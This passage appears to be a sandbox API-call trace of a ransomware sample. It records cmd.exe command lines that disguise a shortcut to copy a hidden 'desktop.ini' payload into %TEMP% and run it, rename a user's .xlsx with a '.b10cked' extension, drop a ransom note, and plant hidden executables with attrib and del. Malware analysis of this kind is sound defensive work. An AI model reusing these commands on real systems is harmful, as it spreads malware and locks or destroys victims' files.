2 [0128.391] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0128.392] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0128.392] CharUpperBuffW (in: lpsz="explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"1VHPWYXY0YNVR KBAEH\" & TYPE \"1VHPWYXY0YNVR KBAEH\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x77 [0128.392] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0128.392] CharUpperBuffW (in: lpsz="explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"1VHPWYXY0YNVR KBAEH\" & TYPE \"1VHPWYXY0YNVR KBAEH\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0128.392] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0128.392] CoInitialize (pvReserved=0x0) returned 0x0 [0128.392] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0128.393] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0128.394] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0128.394] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\desktop.ini\" > \"%TEMP%\\dpMuznsG.exe\" && \"%TEMP%\\dpMuznsG.exe\"") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0128.395] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0128.395] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh.lnk", fRemember=0) returned 0x0 [0128.404] 
ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0128.404] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0128.404] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0128.404] CoUninitialize () [0128.404] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\cf awiikkxwa7md7fcc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18519445630) returned 1 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xfa61 [0128.407] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xff49 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0xff49 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0128.409] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7fa3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0128.409] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7fa3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-32675, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7fa6 [0128.410] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7fa3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-32675, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7fa6 [0128.410] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7fa3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cf aWIIkKxWa7MD7fCc.xlsx", cchWideChar=24, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cf aWIIkKxWa7MD7fCc.xlsx", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cf aWIIkKxWa7MD7fCc.xlsx", lpUsedDefaultChar=0x0) returned 24 [0128.421] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xff49 [0128.421] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0128.421] CloseHandle (hObject=0x114) returned 1 [0128.422] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Cf aWIIkKxWa7MD7fCc.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS") returned 0x3f [0128.423] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.423] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x320, dwThreadId=0x7fc)) returned 1 [0128.425] CloseHandle (hObject=0x110) returned 1 [0128.425] CloseHandle (hObject=0x114) returned 1 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0128.425] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0128.425] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", 
cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0128.425] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0128.426] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0128.426] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0128.426] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.426] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0128.426] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0128.426] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x928, dwThreadId=0x924)) returned 1 [0128.442] CloseHandle (hObject=0x110) returned 1 [0128.442] CloseHandle (hObject=0x114) returned 1 [0128.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0xffffffff [0128.442] GetLastError () returned 0x2 [0128.442] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0128.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0128.445] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.445] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0128.446] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0128.446] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.446] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0128.446] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0128.446] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0128.446] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.447] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE 